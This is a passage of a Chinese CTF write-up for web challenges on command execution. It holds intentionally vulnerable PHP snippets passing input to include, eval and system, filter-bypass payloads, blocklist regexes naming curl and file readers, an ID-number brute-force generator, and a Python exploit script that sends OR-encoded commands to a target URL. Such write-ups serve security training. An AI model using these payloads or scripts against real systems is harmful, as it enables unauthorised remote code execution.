<li><strong>中间缺少8位数，利用1990年到2000年之间的出生日期构造第一名学生的身份证号payload</strong></li>
</ul>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> ($y=<span class="number">1990</span>; $y &lt; <span class="number">2000</span>; $y++) &#123; </span><br><span class="line">	<span class="keyword">for</span> ($m=<span class="number">1</span>; $m &lt; <span class="number">13</span>; $m++) &#123; </span><br><span class="line">		<span class="keyword">if</span> ($m &lt; <span class="number">10</span>) &#123;</span><br><span class="line">			$m = <span class="string">"0"</span>.$m;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">for</span> ($d=<span class="number">1</span>; $d &lt; <span class="number">32</span>; $d++) &#123; </span><br><span class="line">			<span class="keyword">if</span> ($d &lt; <span class="number">10</span>) &#123;</span><br><span class="line">				$d = <span class="string">"0"</span>.$d;</span><br><span class="line">			&#125;</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">"621022"</span>.$y.$m.$d.<span class="string">"5237"</span>.<span class="string">"&lt;br/&gt;"</span>;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210715220453961.png" alt="image-20210715220453961"></p>
<ul>
<li>burp跑一遍<ul>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210715220728598.png" alt="image-20210715220728598"></li>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210715220802214.png" alt="image-20210715220802214"></li>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210715220834627.png" alt="image-20210715220834627"></li>
</ul>
</li>
</ul>
</blockquote>
<h2 id="web28"><a href="#web28" class="headerlink" title="web28"></a>web28</h2><blockquote>
<ul>
<li><strong>发现index会跳转0/1/2.txt</strong></li>
<li><strong>正常网站是index.php</strong></li>
<li><strong>报错0和1的深度试试</strong><ul>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210715221957039.png" alt="image-20210715221957039"></li>
</ul>
</li>
</ul>
</blockquote>
<h1 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h1><h2 id="web29"><a href="#web29" class="headerlink" title="web29"></a>web29</h2><blockquote>
<ul>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210707102447577.png" alt="image-20210707102447577"></li>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210707102530786.png" alt="image-20210707102530786"></li>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210707102544429.png" alt="image-20210707102544429"></li>
</ul>
</blockquote>
<h2 id="web30"><a href="#web30" class="headerlink" title="web30"></a>web30</h2><blockquote>
<ul>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210707103118631.png" alt="image-20210707103118631"></li>
</ul>
<ul>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210707103144554.png" alt="image-20210707103144554"></li>
</ul>
</blockquote>
<h2 id="web31"><a href="#web31" class="headerlink" title="web31"></a>web31</h2><blockquote>
<ul>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210707105029901.png" alt="image-20210707105029901"></li>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210707105220231.png" alt="image-20210707105220231"></li>
</ul>
</blockquote>
<h2 id="web32"><a href="#web32" class="headerlink" title="web32"></a>web32</h2><blockquote>
<ul>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210707110929422.png" alt="image-20210707110929422"></li>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210707111000644.png" alt="image-20210707111000644"></li>
</ul>
</blockquote>
<h2 id="web33"><a href="#web33" class="headerlink" title="web33"></a>web33</h2><blockquote>
<ul>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210707210348568.png" alt="image-20210707210348568"></li>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210707210419087.png" alt="image-20210707210419087"></li>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210707210435823.png" alt="image-20210707210435823"></li>
</ul>
</blockquote>
<h2 id="web34"><a href="#web34" class="headerlink" title="web34"></a>web34</h2><blockquote>
<ul>
<li>和33题一样</li>
</ul>
</blockquote>
<h2 id="web35"><a href="#web35" class="headerlink" title="web35"></a>web35</h2><blockquote>
<ul>
<li>和32题一样</li>
</ul>
</blockquote>
<h2 id="web36"><a href="#web36" class="headerlink" title="web36"></a>web36</h2><blockquote>
<ul>
<li>和32题一样就是把1换成a</li>
</ul>
</blockquote>
<h2 id="web37"><a href="#web37" class="headerlink" title="web37"></a>web37</h2><blockquote>
<ul>
<li><p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210707215121215.png" alt="image-20210707215121215"></p>
</li>
<li><p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210707215132578.png" alt="image-20210707215132578"></p>
</li>
</ul>
</blockquote>
<h2 id="web38"><a href="#web38" class="headerlink" title="web38"></a>web38</h2><blockquote>
<ul>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210707215958632.png" alt="image-20210707215958632"></li>
</ul>
</blockquote>
<h2 id="web39"><a href="#web39" class="headerlink" title="web39"></a>web39</h2><blockquote>
<ul>
<li>和38一样</li>
</ul>
</blockquote>
<h2 id="web40"><a href="#web40" class="headerlink" title="web40"></a>web40</h2><blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//flag in flag.php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'c'</span>]))&#123;</span><br><span class="line">    $c = $_GET[<span class="string">'c'</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">"/flag/i"</span>, $c))&#123;</span><br><span class="line">        <span class="keyword">include</span>($c.<span class="string">".php"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">        </span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<ul>
<li><strong>根据提示套娃方法</strong><ul>
<li><strong>show_source(next(array_reverse(scandir(pos(localeconv())))));</strong></li>
</ul>
</li>
<li><strong>解析：show_source(“flag.php”);可以直接显示当前文件</strong><ul>
<li><strong>localeconv()数组中第一个元素是.可以取路径</strong></li>
<li><strong>pos()就是取数据中第一个元素</strong></li>
<li><strong>array_reverse()将数组倒序利用next()取flag.php就执行了flag.php</strong><ul>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210716180426690.png" alt="image-20210716180426690"></li>
</ul>
</li>
</ul>
</li>
<li><strong>根据cookie命令执行方法</strong><ul>
<li><strong>c=session_start()<em>;system(session_id());</em> passid=ls</strong></li>
<li><strong>解析利用session会话进行获取passid中的ls来进行命令执行</strong></li>
<li><strong>但是不能正常执行tac flag.php</strong></li>
</ul>
</li>
<li><strong>根据post传参来进行命令执行</strong><ul>
<li><strong>利用-print_r(get_defined_vars())输出所有变量来查看</strong></li>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210716182731071.png" alt="image-20210716182731071"></li>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210716182805741.png" alt="image-20210716182805741"></li>
<li><strong>利用next和array_pop来取出值</strong><ul>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210716182918300.png" alt="image-20210716182918300"></li>
</ul>
</li>
<li><strong>eval没有被禁用，尝试命令执行</strong><ul>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210716182955897.png" alt="image-20210716182955897"></li>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210716183112793.png" alt="image-20210716183112793"></li>
</ul>
</li>
</ul>
</li>
</ul>
</blockquote>
<h2 id="web41"><a href="#web41" class="headerlink" title="web41"></a>web41</h2><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'c'</span>]))&#123;</span><br><span class="line">    $c = $_POST[<span class="string">'c'</span>];</span><br><span class="line"><span class="keyword">if</span>(!preg_match(<span class="string">'/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\&#123;|\&#125;|\&amp;|\-/i'</span>, $c))&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="string">"echo($c);"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<ul>
<li><strong>过滤了数字和字母和一些其他字符我们还是可以利用或运算来进行绕过，例如A的ascii码是65，用羽师傅的代码写的是64|1就得到了65，来构造payload</strong></li>
</ul>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210717105826825.png" alt="image-20210717105826825"></p>
<blockquote>
<ul>
<li><p><strong>经过测试，想要在php中实现或运算，实际上服务器上会进行url解码，所以需要用十六进制的字符编码利用或运算进行绕过前端代码验证，写了个代码进行验证，因为phpinfo()可以使用(‘phpinfo’)()形式执行所以构造了</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Author</span>: GuYing</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Date</span>:   2021/7/17</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="comment">//或</span></span><br><span class="line">$c = $_GET[<span class="string">'c'</span>];</span><br><span class="line"><span class="keyword">eval</span>(<span class="string">"echo($c);"</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">//(('%40'|'%10').('%40'|'%08').('%40'|'%10').('%40'|'%09').('%40'|'%0e').('%40'|'%06').('%40'|'%0F'))()</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>
</li>
<li><p><strong>可以直接绕过当(’PHPINFO‘)()执行构造</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload1 ?c&#x3D;((&#39;%40&#39;|&#39;%10&#39;).(&#39;%40&#39;|&#39;%08&#39;).(&#39;%40&#39;|&#39;%10&#39;).(&#39;%40&#39;|&#39;%09&#39;).(&#39;%40&#39;|&#39;%0e&#39;).(&#39;%40&#39;|&#39;%06&#39;).(&#39;%40&#39;|&#39;%0F&#39;))()</span><br><span class="line"></span><br><span class="line">payload2 ?c&#x3D;((&quot;%10%08%10%09%0e%06%0f&quot;|&quot;%60%60%60%60%60%60%60&quot;))()</span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210717110940082.png" alt="image-20210717110940082"></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210717144624204.png" alt="image-20210717144624204"></p>
</li>
<li><p>沿用羽师傅的代码</p>
</li>
<li><p><strong>解释一下：先是ascill码256个字符的所对应的16进制数，然后利用preg_match排除他们本身的二进制字符串是属于被过滤范围内的，可以大量减少运行时间，然后再读入到rce_or.txt中，利用python写exp进行利用。</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Author</span>: GuYing</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Date</span>:   2021/7/17</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="comment">//异或</span></span><br><span class="line">$myfile = fopen(<span class="string">"rce_or.txt"</span>, <span class="string">"w"</span>);</span><br><span class="line">$contents = <span class="string">""</span>;</span><br><span class="line"><span class="keyword">for</span> ($i=<span class="number">0</span>; $i &lt; <span class="number">256</span>; $i++) &#123; </span><br><span class="line">	<span class="keyword">for</span> ($j=<span class="number">0</span>; $j &lt; <span class="number">256</span> ; $j++) &#123; </span><br><span class="line"></span><br><span class="line">		<span class="keyword">if</span> ($i&lt;<span class="number">16</span>) &#123;</span><br><span class="line">			$hex_i=<span class="string">'0'</span>.dechex($i);</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">else</span>&#123;</span><br><span class="line">			$hex_i=dechex($i);</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">if</span>($j&lt;<span class="number">16</span>)&#123;</span><br><span class="line">			$hex_j=<span class="string">'0'</span>.dechex($j);</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">else</span>&#123;</span><br><span class="line">			$hex_j = dechex($j);</span><br><span class="line">		&#125;</span><br><span class="line">		$preg = <span class="string">'/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\&#123;|\&#125;|\&amp;|\-/i'</span>;</span><br><span class="line">		<span class="keyword">if</span>(preg_match($preg, hex2bin($hex_i))||preg_match($preg, hex2bin($hex_j)))&#123;</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">''</span>;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">else</span>&#123;</span><br><span class="line">			$a = <span class="string">'%'</span>.$hex_i;</span><br><span class="line">			$b = <span class="string">'%'</span>.$hex_j;</span><br><span class="line">			$c = (urldecode($a) | urldecode($b));</span><br><span class="line">			<span class="keyword">if</span> (ord($c)&gt;=<span class="number">32</span>&amp;ord($c)&lt;=<span class="number">126</span>)</span><br><span class="line">			&#123;</span><br><span class="line">				$contents=$contents.$c.<span class="string">" "</span>.$a.<span class="string">" "</span>.$b.<span class="string">"\n"</span>;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">		</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">fwrite($myfile, $contents);</span><br><span class="line">fclose($myfile);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>
</li>
<li><p><strong>python跑一下脚本</strong></p>
</li>
</ul>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> urllib</span><br><span class="line"><span class="keyword">from</span> sys <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line">os.system(<span class="string">"php rce_or.php"</span>)  <span class="comment"># 执行shell语句</span></span><br><span class="line"><span class="keyword">if</span> (len(argv) != <span class="number">2</span>):</span><br><span class="line">    print(len(argv))</span><br><span class="line">    print(argv)</span><br><span class="line">    print(argv[<span class="number">0</span>:<span class="number">2</span>])</span><br><span class="line">    print(<span class="string">"="</span> * <span class="number">50</span>)</span><br><span class="line">    print(<span class="string">'USER：python exp.py &lt;url&gt;'</span>)</span><br><span class="line">    print(<span class="string">"eg：  python exp.py http://ctf.show/"</span>)</span><br><span class="line">    print(<span class="string">"="</span> * <span class="number">50</span>)</span><br><span class="line">    exit(<span class="number">0</span>)</span><br><span class="line">url = argv[<span class="number">1</span>]</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">action</span><span class="params">(arg)</span>:</span></span><br><span class="line">    s1 = <span class="string">""</span></span><br><span class="line">    s2 = <span class="string">""</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> arg:</span><br><span class="line">        f = open(<span class="string">"rce_or.txt"</span>, <span class="string">"r"</span>)</span><br><span class="line">        <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">            t = f.readline()</span><br><span class="line">            <span class="keyword">if</span> t == <span class="string">""</span>:</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">            <span class="keyword">if</span> t[<span class="number">0</span>] == i:</span><br><span class="line">                <span class="comment"># print(i)</span></span><br><span class="line">                s1 += t[<span class="number">2</span>:<span class="number">5</span>]</span><br><span class="line">                s2 += t[<span class="number">6</span>:<span class="number">9</span>]</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">        f.close()</span><br><span class="line">    output = <span class="string">"(\""</span> + s1 +<span class="string">"\"|\""</span> + s2 + <span class="string">"\")"</span></span><br><span class="line">    <span class="keyword">return</span> (output)</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    param = action(input(<span class="string">"Your function :  "</span>)) + action(input(<span class="string">"Your command:  "</span>))</span><br><span class="line">    print(<span class="string">"Your payload: "</span>+param);</span><br><span class="line">    data = &#123;</span><br><span class="line">        <span class="string">'c'</span>: urllib.parse.unquote(param)</span><br><span class="line">    &#125;</span><br><span class="line">    print(data)</span><br><span class="line">    r = requests.post(url , data=data)</span><br><span class="line">    print(<span class="string">"result: "</span>+r.text)</span><br><span class="line"></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210717150405707.png" alt="image-20210717150405707"></p>
</blockquote>
<h2 id="web42"><a href="#web42" class="headerlink" title="web42"></a>web42</h2><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'c'</span>]))&#123;</span><br><span class="line">    $c=$_GET[<span class="string">'c'</span>];</span><br><span class="line">    system($c.<span class="string">" &gt;/dev/null 2&gt;&amp;1"</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br></pre></td></tr></table></figure></div>

<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210717151636427.png" alt=""></p>
</blockquote>
<h2 id="web43"><a href="#web43" class="headerlink" title="web43"></a>web43</h2><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'c'</span>]))&#123;</span><br><span class="line">    $c=$_GET[<span class="string">'c'</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">"/\;|cat/i"</span>, $c))&#123;</span><br><span class="line">        system($c.<span class="string">" &gt;/dev/null 2&gt;&amp;1"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>



<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210717152049686.png" alt="image-20210717152049686"></p>
</blockquote>
<h2 id="web44"><a href="#web44" class="headerlink" title="web44"></a>web44</h2><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'c'</span>]))&#123;</span><br><span class="line">    $c=$_GET[<span class="string">'c'</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">"/;|cat|flag/i"</span>, $c))&#123;</span><br><span class="line">        system($c.<span class="string">" &gt;/dev/null 2&gt;&amp;1"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br></pre></td></tr></table></figure></div>

<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210717152655692.png" alt="image-20210717152655692"></p>
</blockquote>
<h2 id="web45"><a href="#web45" class="headerlink" title="web45"></a>web45</h2><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'c'</span>]))&#123;</span><br><span class="line">    $c=$_GET[<span class="string">'c'</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">"/\;|cat|flag| /i"</span>, $c))&#123;</span><br><span class="line">        system($c.<span class="string">" &gt;/dev/null 2&gt;&amp;1"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210717153219160.png" alt="image-20210717153219160"></p>
</blockquote>
<h2 id="web46"><a href="#web46" class="headerlink" title="web46"></a>web46</h2><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'c'</span>]))&#123;</span><br><span class="line">    $c=$_GET[<span class="string">'c'</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">"/\;|cat|flag| |[0-9]|\\$|\*/i"</span>, $c))&#123;</span><br><span class="line">        system($c.<span class="string">" &gt;/dev/null 2&gt;&amp;1"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210717183425122.png" alt="image-20210717183425122"></p>
</blockquote>
<h2 id="web47"><a href="#web47" class="headerlink" title="web47"></a>web47</h2><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'c'</span>]))&#123;</span><br><span class="line">    $c=$_GET[<span class="string">'c'</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">"/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i"</span>, $c))&#123;</span><br><span class="line">        system($c.<span class="string">" &gt;/dev/null 2&gt;&amp;1"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>



<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210717183713606.png" alt="image-20210717183713606"></p>
</blockquote>
<h2 id="web48"><a href="#web48" class="headerlink" title="web48"></a>web48</h2><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'c'</span>]))&#123;</span><br><span class="line">    $c=$_GET[<span class="string">'c'</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">"/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i"</span>, $c))&#123;</span><br><span class="line">        system($c.<span class="string">" &gt;/dev/null 2&gt;&amp;1"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span 